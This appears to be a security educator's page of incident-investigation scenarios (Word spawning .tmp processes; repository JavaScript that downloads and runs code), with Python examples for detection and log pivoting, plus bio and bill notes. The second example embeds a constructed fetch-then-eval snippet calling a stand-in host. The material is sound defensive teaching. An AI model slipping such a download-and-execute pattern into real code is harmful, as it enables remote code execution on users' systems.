Investigation Scenario 🔎
You've discovered winword.exe as the parent process to files matching the following regular expression pattern: [a-z0-9]{4}\.tmp
What do you look for to investigate whether an incident occurred?
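As an added example (not part of the original thread or the author's material), the Python below pulls the events this scenario describes out of process-creation telemetry and surfaces the fields an analyst would pivot on next: the child's full command line and the document Word had open when it spawned the child. The events, paths, and command lines are constructed for illustration and the field names follow Sysmon Event ID 1. It also demonstrates a caveat in the pattern itself: `[a-z0-9]{4}\.tmp` must be anchored to the whole file name, otherwise Word's own `~WRD0001.tmp`-style working files match on their trailing four digits, and because NTFS paths are case-insensitive the match should ignore case.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in Sysmon Event ID 1 style.
# Paths, users and command lines are made up for illustration; this is not real telemetry.
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EVENTS = [
    {   # Word launching a four-character .tmp from the user's Temp folder: the scenario's hit
        "ParentImage": WINWORD,
        "ParentCommandLine": f'"{WINWORD}" /n "C:\\Users\\alice\\Downloads\\invoice.docm"',
        "Image": r"C:\Users\alice\AppData\Local\Temp\a7f3.tmp",
        "CommandLine": r"C:\Users\alice\AppData\Local\Temp\a7f3.tmp",
    },
    {   # Word spawning the print-driver helper: an expected child, must not match
        "ParentImage": WINWORD,
        "ParentCommandLine": f'"{WINWORD}"',
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
    {   # A .tmp started by Explorer, not by Word: outside this scenario
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
        "Image": r"C:\Users\alice\AppData\Local\Temp\9bc2.tmp",
        "CommandLine": r"C:\Users\alice\AppData\Local\Temp\9bc2.tmp",
    },
    {   # Word-style working file name: matches the regex only if the match is not anchored
        "ParentImage": WINWORD,
        "ParentCommandLine": f'"{WINWORD}" /n "C:\\Users\\alice\\Documents\\notes.docx"',
        "Image": r"C:\Users\alice\Documents\~WRD0001.tmp",
        "CommandLine": r"C:\Users\alice\Documents\~WRD0001.tmp",
    },
]

# The pattern from the scenario. IGNORECASE because Windows file names are case-insensitive.
TMP_NAME = re.compile(r"[a-z0-9]{4}\.tmp", re.IGNORECASE)


def is_word_child(event):
    """True when the parent image is winword.exe, regardless of install path or case."""
    return PureWindowsPath(event["ParentImage"]).name.lower() == "winword.exe"


def tmp_children_of_word(events, anchored=True):
    """Return events where winword.exe started a process whose file name matches TMP_NAME.

    anchored=True uses fullmatch on the file name; anchored=False uses search, which also
    catches longer names that merely end in four [a-z0-9] characters plus .tmp.
    """
    hits = []
    for ev in events:
        if not is_word_child(ev):
            continue
        name = PureWindowsPath(ev["Image"]).name
        matched = TMP_NAME.fullmatch(name) if anchored else TMP_NAME.search(name)
        if matched:
            hits.append(ev)
    return hits


def hit_names(events, anchored=True):
    """File names of the matching children, in log order."""
    return [PureWindowsPath(ev["Image"]).name for ev in tmp_children_of_word(events, anchored)]


def opened_document(event):
    """Recover the document Word had open from its command line: the first quoted
    argument with a Word document extension. Returns None if no document was passed."""
    m = re.search(r'"([^"]+\.(?:docx?|docm|dotm?|rtf))"', event["ParentCommandLine"], re.IGNORECASE)
    return m.group(1) if m else None


if __name__ == "__main__":
    for ev in tmp_children_of_word(EVENTS):
        print("child:     ", ev["CommandLine"])
        print("parent cmd:", ev["ParentCommandLine"])
        print("document:  ", opened_document(ev))
    print("unanchored also matches:", hit_names(EVENTS, anchored=False))
```

The anchored run returns only `a7f3.tmp`; the unanchored run adds `~WRD0001.tmp`, which is why the regex as written needs to be applied to the whole file name rather than searched within it. The recovered document path is the natural next pivot: its origin (download, email attachment), its macro content, and whether the .tmp child went on to create processes or network connections of its own.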
Security Analyst, Author, and Instructor, Ed.D.
Studying the intersection of security investigation doctrine, cognitive psychology, and education.
Founder of Applied Network Defense and Rural Tech Fund
Books:
🍯 Intrusion Detection Honeypots
🦈 Practical Packet Analysis
🌐 Applied Network Security Monitoring
Former: Mandiant, InGuardians, Dept of Defense, Roadside Fruit Vendor.
A question well stated is a problem half-solved. #InvestigationTheory
Blog: https://chrissanders.org/
Training Courses: http://networkdefense.co/courses/
Twitter: https://twitter.com/chrissanders88
Books: https://chrissanders.org/publications
More Links: https://chrissanders.org/links/
I had the opportunity to work with Congressman David Scott's office to help craft the Rural American Vitalization in Extraterrestrial Space (RAVES) Reporting Act, which was introduced on the US House of Representatives floor this week.
The bill establishes a study to determine the ability, capacity, and recommendation for transforming rural sites into U.S. space-industry manufacturing hubs.
Details on the bill and a quote of support from me here: https://davidscott.house.gov/news/documentsingle.aspx?DocumentID=400926
The AND Analyst Skills Vault is a subscription-based service that provides access to our growing collection of standalone video lessons built by domain experts. We add new lessons monthly for security analysts, forensic investigators, malware analysts, threat hunters, intelligence analysts, and other defensive security practitioners.
Investigation Scenario 🔎
While reviewing company code in GitHub, you discover odd JavaScript that downloads and executes a file from an unknown domain that is currently inaccessible.
What do you look for to investigate whether an incident occurred?
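As an added example (not part of the original thread or the author's material), the Python below works through two of the checks this scenario invites: confirm that the snippet really is a download-and-execute pattern and extract the remote host from it, then pivot into resolver logs to learn whether any internal client ever resolved that host. The domain being inaccessible today says nothing about what happened before, so historical DNS is where the timeline starts. The JavaScript snippet, the `.example` domain, and the resolver log lines are all constructed for illustration, and the sink regex is a heuristic, not a complete list of JavaScript code-execution sinks.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for the odd snippet found in the repository; not code from any real project.
SUSPICIOUS_JS = '''
function refresh() {
  fetch("https://cdn.update-check.example/payload.js")
    .then(function (r) { return r.text(); })
    .then(function (src) { eval(src); });
}
'''

# Constructed resolver log: timestamp, client IP, query type, name, response code.
# Not real logs. Note the domain resolved in May and only later went NXDOMAIN.
DNS_LOG = """\
2024-05-02T09:58:12Z 10.0.4.22 A cdn.update-check.example NOERROR
2024-05-02T09:58:13Z 10.0.4.22 A static.example.org NOERROR
2024-05-03T14:02:41Z 10.0.7.9 A cdn.update-check.example NOERROR
2024-05-10T08:15:00Z 10.0.4.22 A cdn.update-check.example NXDOMAIN
"""

URL_RE = re.compile(r"""https?://[^\s"'`<>)]+""")
# Heuristic sinks that turn fetched text into running code. A remote URL plus one of
# these is what makes the snippet download-and-execute rather than a plain API call.
EXEC_SINK_RE = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|document\.write\s*\(")


def remote_hosts(js):
    """Distinct hostnames referenced by absolute http(s) URLs in the source."""
    return sorted({urlparse(u).hostname for u in URL_RE.findall(js)})


def is_download_execute(js):
    """True when the source both reaches out to a remote host and feeds text to a code sink."""
    return bool(remote_hosts(js)) and EXEC_SINK_RE.search(js) is not None


def dns_activity(domain, log_text):
    """Summarise queries for domain: first/last seen, which clients asked, and whether
    it ever resolved successfully. Returns None if the domain never appears."""
    rows = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than abort the sweep
        ts, client, _qtype, qname, rcode = parts
        if qname.lower().rstrip(".") == domain.lower():
            rows.append((ts, client, rcode))
    if not rows:
        return None
    rows.sort()  # ISO-8601 UTC timestamps sort lexicographically
    return {
        "first_seen": rows[0][0],
        "last_seen": rows[-1][0],
        "clients": sorted({client for _, client, _ in rows}),
        "resolved_once": any(rcode == "NOERROR" for _, _, rcode in rows),
    }


if __name__ == "__main__":
    print("download+execute:", is_download_execute(SUSPICIOUS_JS))
    for host in remote_hosts(SUSPICIOUS_JS):
        print(host, "->", dns_activity(host, DNS_LOG))
```

If the summary shows clients that resolved the host while it was live, those machines are the first place to look for the downloaded file and its children. The other pivot is the repository itself: `git log -S` on the URL string identifies the commit, author, and date that introduced the snippet, and whether that commit went through review.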